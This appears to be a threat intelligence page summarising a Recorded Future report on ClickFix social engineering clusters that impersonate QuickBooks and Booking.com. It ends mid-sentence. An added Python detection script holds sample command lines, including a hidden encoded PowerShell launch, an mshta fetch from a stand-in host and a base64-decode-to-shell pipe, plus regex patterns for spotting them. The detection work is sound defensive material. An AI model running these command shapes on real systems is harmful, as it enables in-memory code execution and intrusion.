Tags: malware, high, ClickFix, Social Engineering, Initial Access, Living-off-the-Land Attack

Mar 25, 2026 • Recorded Future

ClickFix Campaigns Targeting Windows and macOS

Source: Recorded Future
Category: malware
Severity: high

Executive Summary

Insikt Group identified five distinct ClickFix social engineering clusters impersonating QuickBooks, Booking.com, and Birdeye, targeting Windows and macOS users since May 2024. The technique tricks victims into manually executing obfuscated commands via native system tools such as the Windows Run dialog or the macOS Terminal, enabling in-memory code execution that bypasses traditional browser and endpoint security controls. The campaign demonstrates operational sophistication through OS detection and varied lure themes, while maintaining a consistent four-stage execution framework. ClickFix has evolved into a standardized, high-ROI initial access vector adopted by both cybercriminal and potentially APT groups across the accounting, travel, real estate, and legal sectors. Insikt Group assesses that this methodology will remain a primary attack vector through 2026. Defenders should disable the Windows Run dialog via GPO, implement PowerShell Constrained Language Mode, and deploy behavior-based detection rather than relying on indicator blocking.

Summary

Insikt Group reveals five ClickFix social engineering clusters (QuickBooks, Booking.com, Birdeye) targeting Windows and macOS. Learn how threat actors exploit native system tools with malicious, obfuscated commands to gain initial access, and get key mitigations for defense.

Published Analysis

Executive Summary

Insikt Group identified five distinct clusters leveraging the ClickFix social engineering technique to facilitate initial access to host systems. Observed since at least May 2024, these clusters include those impersonating the financial application Intuit QuickBooks and the travel agency Booking.com. Insikt Group leveraged the Recorded Future® HTML Content Analysis dataset, which enables systematic monitoring of embedded web artifacts to identify and track new malicious domains and infrastructure.
The clusters demonstrate significant operational variance in lure themes and infrastructure patterns, and highlight the technique's evolution: moving past simple verification prompts by visually fooling victims with various fake challenges, and demonstrating technical sophistication through operating system detection to tailor execution chains. Despite these structural differences, the technique's operation is largely the same, showing that ClickFix's core techniques work across platforms and only the social engineering lure needs to be adapted to the victim.

Threat actors manipulate victims into executing malicious, obfuscated commands directly within native system tools like the Windows Run dialog box or macOS Terminal. This living-off-the-land (LotL) approach allows malicious scripts to execute in memory, effectively bypassing traditional browser security and endpoint controls. Parallel clusters targeting sectors as diverse as accounting, real estate, and legal services indicate that ClickFix has transitioned into a standardized, high-ROI template for both cybercriminal and potentially advanced persistent threat (APT) groups.

To protect against these threats, security defenders should move beyond simple indicator blocking and prioritize aggressive behavioral hardening. Key recommendations include disabling the Windows Run dialog box via Group Policy Objects (GPO), implementing PowerShell Constrained Language Mode (CLM), and operationalizing Digital Risk Prevention tools such as Recorded Future's Malicious Websites to identify and mitigate threats to your digital assets. Based on increasing use since 2024, Insikt Group assesses that the ClickFix methodology will very likely remain a primary initial access vector throughout 2026 as threat actors continue to social engineer victims to enable exploitation.
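Detection logic of the behavioral kind the report recommends, as an added example that is not part of the Recorded Future report or this page: it flags process launches matching the ClickFix execution shape (a native tool spawned from the Windows Run dialog or a macOS Terminal shell, with encoded, hidden-window, or remote-fetch arguments). The event fields, host names, parent lists and regex patterns are assumptions, and the command lines are constructed placeholders rather than real payloads.

```python
import re
# Constructed process-creation events in the shape of Sysmon Event ID 1 / EDR
# telemetry: parent image, child image, full command line. Payloads are placeholders.
SAMPLE_EVENTS = [
    {"host": "win-acct-01", "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -w hidden -NoProfile -enc <BASE64_PLACEHOLDER>"},
    {"host": "win-acct-01", "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\mshta.exe",
     "cmdline": "mshta.exe http://verify.example.invalid/check.hta"},
    {"host": "mac-legal-03", "parent": "/bin/zsh", "image": "/bin/bash",
     "cmdline": 'bash -c "echo <BASE64_PLACEHOLDER> | base64 --decode | sh"'},
    {"host": "win-acct-02", "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /c ipconfig /all"},
    {"host": "win-acct-02", "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\notepad.exe", "cmdline": "notepad.exe notes.txt"},
]
# Where the pasted command lands: the Run dialog runs under explorer.exe on Windows;
# on macOS the interactive shell under Terminal is the parent (assumed parent lists).
RUN_DIALOG_PARENTS = ("explorer.exe",)
MAC_SHELL_PARENTS = ("/bin/zsh", "/bin/bash", "/bin/sh")
# Stage 2 of the pattern: native tools the lure's command invokes.
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
           "curl", "bash", "sh", "zsh", "osascript"}
# Stage 1 (encoded/fragmented input) and stage 3 (in-memory, remotely fetched) traits.
OBFUSCATION = [
    (r"-enc(odedcommand)?\b", "encoded command"),
    (r"-w(indowstyle)?\s+hidden", "hidden window"),
    (r"\b(iex|invoke-expression)\b", "invoke-expression"),
    (r"frombase64string|base64\s+(-d|--decode)", "base64 decode"),
    (r"downloadstring|invoke-webrequest|\bcurl\b|mshta\.exe\s+https?://", "remote fetch"),
    (r"\|\s*(ba)?sh\b", "pipe to shell"),
]

def classify(event):
    """Return a finding dict for one event, or None when it does not fit the ClickFix shape."""
    parent, image, cmd = (event[k].lower() for k in ("parent", "image", "cmdline"))
    if not (parent.endswith(RUN_DIALOG_PARENTS) or parent in MAC_SHELL_PARENTS):
        return None
    binary = image.rsplit("\\", 1)[-1].rsplit("/", 1)[-1]
    if binary not in LOLBINS:
        return None
    traits = [label for pattern, label in OBFUSCATION if re.search(pattern, cmd)]
    # Launcher plus LOLBin alone is routine admin activity (medium); traits lift it to high.
    return {"host": event["host"], "binary": binary,
            "severity": "high" if traits else "medium", "traits": traits}

def scan(events):
    return [finding for finding in map(classify, events) if finding]
```

The launcher-plus-LOLBin rule alone fires on routine administration, which is why it is rated medium; map the parent and image fields to your EDR's schema and feed the traits into a correlation rule rather than blocking on any single pattern.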
Looking ahead, Insikt Group anticipates ClickFix lures will become increasingly technically adaptive, incorporating more selective browser fingerprinting, while continuing to use infrastructure that can be built and dismantled quickly. In addition to technical refinements, Insikt Group predicts that the social engineering component will continue to evolve, leveraging new techniques to lure victims into executing malicious commands.

Key Findings

Insikt Group identified and tracked five distinct ClickFix activity clusters exhibiting significant operational variance in lure themes and infrastructure patterns despite a shared reliance on fraudulent human-verification lures. This indicates that the ClickFix methodology has transitioned into a standardized, high-ROI template adopted across a fragmented ecosystem of threat actors.

While visually diverse, all analyzed clusters use a consistent execution framework that bypasses traditional browser security controls by shifting the point of exploitation to user-assisted manual commands.

These campaigns target a wide variety of sectors, including accounting (QuickBooks), travel (Booking.com), and system optimization (macOS).

ClickFix technical execution follows a standardized four-stage pattern: input of highly encoded or fragmented strings, native execution via legitimate system...